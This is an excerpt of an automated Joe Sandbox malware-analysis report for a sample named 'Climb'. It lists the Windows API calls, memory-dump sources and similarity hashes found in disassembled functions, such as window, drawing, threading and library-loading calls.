                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: d6a020cdfc314bc59de239e0c53703bcd0f0d803ef3534a0ce5f65f3af47f369
                                                                                                                                                                          • Instruction ID: 8ac63115d8efef85eb6f8356fa1a7af55b5586a0165994a80ef7a30a56f9f02f
                                                                                                                                                                          • Opcode Fuzzy Hash: d6a020cdfc314bc59de239e0c53703bcd0f0d803ef3534a0ce5f65f3af47f369
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11F73A900228FFEB159BA5CD85FDDBB78FB08750F2000A1EA11B7290D7716E60DB94
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 000B1AF4
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 000F31F9
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 000F3203
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 000F320E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4127811313-0
                                                                                                                                                                          • Opcode ID: ad0903aabc425872064fd77ceeda2bd25b927abb3b69919d1da3b5989e04dda6
                                                                                                                                                                          • Instruction ID: f353da22888e6277f35706f1f98e21cfa43208dcab63a06ea5e055349738e891
                                                                                                                                                                          • Opcode Fuzzy Hash: ad0903aabc425872064fd77ceeda2bd25b927abb3b69919d1da3b5989e04dda6
                                                                                                                                                                          • Instruction Fuzzy Hash: D8114836A0101AEBCF10DFA8D9859FE77B8FB05354F500452EA02E3551D770BA91DBA2
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0011EB14
                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 0011EB47
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0011EB5D
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0011EB64
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                                          • Opcode ID: 5b1563e93e161767b2e723a0ad259021ea2f8b936c8f0a220fb58ee56b9f7f81
                                                                                                                                                                          • Instruction ID: 5daf9b524b63c41ef56f29da401f4a79d026f3692e23d440f15b7b878b0a8e75
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b1563e93e161767b2e723a0ad259021ea2f8b936c8f0a220fb58ee56b9f7f81
                                                                                                                                                                          • Instruction Fuzzy Hash: 1311DB76A04258BBCB059FE8AC05ADE7FADBB47310F144266FC15D3691D7748A848760
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,000DD369,00000000,00000004,00000000), ref: 000DD588
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000DD594
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 000DD59B
                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 000DD5B9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                          • Opcode ID: ddece91e02d0d4d68e87e2c71bfe75696abb7ce86a0a25a0748836d6091fbe6b
                                                                                                                                                                          • Instruction ID: 617858f82f5ff1bc2d1e0151984d65bb66bcb8365ebe9bc4ece12726cef777a5
                                                                                                                                                                          • Opcode Fuzzy Hash: ddece91e02d0d4d68e87e2c71bfe75696abb7ce86a0a25a0748836d6091fbe6b
                                                                                                                                                                          • Instruction Fuzzy Hash: 9701C076504714BBCB206FA5FC05BAA7B69EF82734F10021BF925862E0CB709940C6B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000B78B1
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 000B78C5
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 000B78CF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                                          • Opcode ID: ed5671c0071d602893872a26243b2b4463f5cfbafcf6731cd063fcb2b4137b22
                                                                                                                                                                          • Instruction ID: 5c02446fa826c11248b6ea1a7457ef797cfc66efc3af8423b9f81515b5c69450
                                                                                                                                                                          • Opcode Fuzzy Hash: ed5671c0071d602893872a26243b2b4463f5cfbafcf6731cd063fcb2b4137b22
                                                                                                                                                                          • Instruction Fuzzy Hash: B211F572545108BFEF125F90DC58EEA7BADFF49368F040125FA0852120DB31DCA0EBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,000E338D,00000364,00000000,00000000,00000000,?,000E35FE,00000006,FlsSetValue), ref: 000E3418
                                                                                                                                                                          • GetLastError.KERNEL32(?,000E338D,00000364,00000000,00000000,00000000,?,000E35FE,00000006,FlsSetValue,00153260,FlsSetValue,00000000,00000364,?,000E31B9), ref: 000E3424
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000E338D,00000364,00000000,00000000,00000000,?,000E35FE,00000006,FlsSetValue,00153260,FlsSetValue,00000000), ref: 000E3432
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          • Opcode ID: 35b068c82576e2183e10b89da5678e715576ae866765c81586bb0e67c14154a7
                                                                                                                                                                          • Instruction ID: 448abf50d49f38a1d7414d2d2039eb9e5f732c29a0a6c523ce836b7084acdd9e
                                                                                                                                                                          • Opcode Fuzzy Hash: 35b068c82576e2183e10b89da5678e715576ae866765c81586bb0e67c14154a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C01FC76711262AFCB324B7AAC48E563FD8BF45B617110220F916F75D0C720EE41C6E0
                                                                                                                                                                          APIs
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0011B69A,?,00008000), ref: 0011BA8B
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0011B69A,?,00008000), ref: 0011BAB0
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0011B69A,?,00008000), ref: 0011BABA
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0011B69A,?,00008000), ref: 0011BAED
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                                          • Opcode ID: 623502476026ba572c15b4b7341ba07d167332ec489e4b7f7eaf15c39484ff05
                                                                                                                                                                          • Instruction ID: 745dfa4e79a780be47f9d635bf1ffe3930d1f1a79ca52671baaf21381749f190
                                                                                                                                                                          • Opcode Fuzzy Hash: 623502476026ba572c15b4b7341ba07d167332ec489e4b7f7eaf15c39484ff05
                                                                                                                                                                          • Instruction Fuzzy Hash: 38115B31C04629E7CF08DFA5F9897EEBB78BF09B11F1140A9D941B3590CB309690CBA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0014888E
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001488A6
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001488CA
                                                                                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001488E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 357397906-0
                                                                                                                                                                          • Opcode ID: eff59a5ba8fe94da74445e340dcd49e5b96d37b18fc4ad2d3099d6022c22b428
                                                                                                                                                                          • Instruction ID: 2f75eb811ca0494803a8b37577ef7c9df3ccb70edcd427586f9bff23d17699a4
                                                                                                                                                                          • Opcode Fuzzy Hash: eff59a5ba8fe94da74445e340dcd49e5b96d37b18fc4ad2d3099d6022c22b428
                                                                                                                                                                          • Instruction Fuzzy Hash: 051143B9D0020AAFDF41CF98D8849EEBBB5FB09310F504156E915E2660D735AA94CF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00113712
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00113723
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0011372A
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00113731
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                                          • Opcode ID: 44cd3c938da52b85c1e02f7686a3167fca910badddfd4e4d85a2c80aaae798e5
                                                                                                                                                                          • Instruction ID: b9320af127524ba4328a159be98d27b4f917eea87d70bed0bdffca3dc6e18e23
                                                                                                                                                                          • Opcode Fuzzy Hash: 44cd3c938da52b85c1e02f7686a3167fca910badddfd4e4d85a2c80aaae798e5
                                                                                                                                                                          • Instruction Fuzzy Hash: 0FE06DB52012247ADA2417A2AC4EEEB7F6CDB43BA1F410025F509D24A0DAA489C0C2B0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1F87
                                                                                                                                                                            • Part of subcall function 000B1F2D: SelectObject.GDI32(?,00000000), ref: 000B1F96
                                                                                                                                                                            • Part of subcall function 000B1F2D: BeginPath.GDI32(?), ref: 000B1FAD
                                                                                                                                                                            • Part of subcall function 000B1F2D: SelectObject.GDI32(?,00000000), ref: 000B1FD6
                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001492E3
                                                                                                                                                                          • LineTo.GDI32(?,?,?), ref: 001492F0
                                                                                                                                                                          • EndPath.GDI32(?), ref: 00149300
                                                                                                                                                                          • StrokePath.GDI32(?), ref: 0014930E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                          • Opcode ID: e5cec67bc2f97c170882aef9a9f3c35ee90003482de58ab16dcd45f0c3a71f72
                                                                                                                                                                          • Instruction ID: 2bf83ddce753581f96a01b6cd26f019db7ea2dd6c63160173eb877bab922b102
                                                                                                                                                                          • Opcode Fuzzy Hash: e5cec67bc2f97c170882aef9a9f3c35ee90003482de58ab16dcd45f0c3a71f72
                                                                                                                                                                          • Instruction Fuzzy Hash: 48F05E35105269BADF125F54AC0EFCE3F69AF0B724F048100FA11624F2C77556A1DBE5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 000B21BC
                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 000B21C6
                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 000B21D9
                                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 000B21E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$ModeObjectStockText
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4037423528-0
                                                                                                                                                                          • Opcode ID: 0d94c7d5b962a7809a698d9e0a1ec4b026eec223f8370cf52e80bb7c682ce7ab
                                                                                                                                                                          • Instruction ID: ef8331efcb2c8c1ba94405dbb650e84ebb2ffd214b595e17b9d62e1d1786a8e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d94c7d5b962a7809a698d9e0a1ec4b026eec223f8370cf52e80bb7c682ce7ab
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BE06D35240684AADF615B74BC09BEC3B61AB16736F048219FBBA984F0C7728680AB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0010EC36
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0010EC40
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0010EC60
                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0010EC81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                          • Opcode ID: ba3b97ecbb48f8a2c11b6b04e723d864141f5eef49d36a5fd4a203b3664de3d5
                                                                                                                                                                          • Instruction ID: 5d0aca2036ab4c662d6b2db283a8f830e3cc714c3049955c350e267afff6527f
                                                                                                                                                                          • Opcode Fuzzy Hash: ba3b97ecbb48f8a2c11b6b04e723d864141f5eef49d36a5fd4a203b3664de3d5
                                                                                                                                                                          • Instruction Fuzzy Hash: 50E04F79C00204DFCF509FA0E908A9DBBF1FB08310F118419F84AE3660C7785982DF00
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0010EC4A
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0010EC54
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0010EC60
                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0010EC81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                          • Opcode ID: 2d282500254a62801ed5692fe086dfcc8ee26c7c4ca661b4940ac80ae9da360c
                                                                                                                                                                          • Instruction ID: 2983b25eb2469a5230a6223249def6f5ab1ecf2962dbae76603775eb20626275
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d282500254a62801ed5692fe086dfcc8ee26c7c4ca661b4940ac80ae9da360c
                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE046B8C00204EFCF509FA0E808A9DBBB1FB08310F118419F80EE3660CB386982DF00
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF
                                                                                                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00125919
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Connection_wcslen
                                                                                                                                                                          • String ID: *$LPT
                                                                                                                                                                          • API String ID: 1725874428-3443410124
                                                                                                                                                                          • Opcode ID: 1c34e45fb3fe9391a178dc23be2613421c8b1d0e2b63a4f462544df69c34dda3
                                                                                                                                                                          • Instruction ID: 93d87257658ed060aea8b7631d5f5f0d34eb1a20ecf987dd88f5977e2a1e1640
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c34e45fb3fe9391a178dc23be2613421c8b1d0e2b63a4f462544df69c34dda3
                                                                                                                                                                          • Instruction Fuzzy Hash: BD917C75A00614DFCB14DF54D4C5EAABBF2AF48308F198099E84A9F362C771EE85CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 000DE67D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                          • String ID: pow
                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                          • Opcode ID: 1bb38090a8db83c9d0fa29ac3e06fea901ad4522de81f649b14ae1cad6c3b507
